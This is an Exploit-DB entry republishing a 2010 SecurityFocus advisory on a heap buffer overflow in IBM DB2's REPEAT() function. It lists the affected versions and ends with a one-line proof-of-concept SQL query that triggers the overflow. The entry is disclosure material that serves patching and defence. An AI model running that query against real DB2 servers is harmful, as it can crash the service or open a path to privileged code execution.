IBM DB2 - 'REPEAT()' Local Heap Buffer Overflow

EDB-ID:

33572




Platform:

Unix

Date:

2010-01-27


source: https://www.securityfocus.com/bid/37976/info

IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.

The issue affects the following:

IBM DB2 versions prior to 9.1 Fix Pack 9
IBM DB2 9.7

Other versions may also be affected. 

SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1